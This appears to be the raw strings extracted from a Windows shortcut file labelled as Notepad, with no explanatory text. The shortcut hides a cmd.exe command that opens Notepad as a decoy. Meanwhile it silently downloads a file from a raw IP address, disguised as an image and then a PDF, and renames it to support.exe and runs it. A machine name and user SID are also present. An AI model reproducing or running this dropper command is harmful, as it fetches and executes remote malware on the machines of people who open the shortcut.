Windows
System32
cmd.exe
C:\Windows\System32\cmd.exe
%SystemRoot%\System32\notepad.exe
desktop-g1k30vq
uY(9Vl
Windows
System32
hcmd.exe
Notepad!..\..\..\Windows\System32\cmd.exe
/c @echo off & start notepad.exe & curl --silent -L "http://45.148.121.227/images/readytunes.png" -o %TEMP%\application1_form.pdf&cd %TEMP%&ren application1_form.pdf support.exe&start support.exeC:\Windows\System32\notepad.exe
%SystemRoot%\System32\notepad.exe
S-1-5-21-324232331-3064657245-3647568631-1001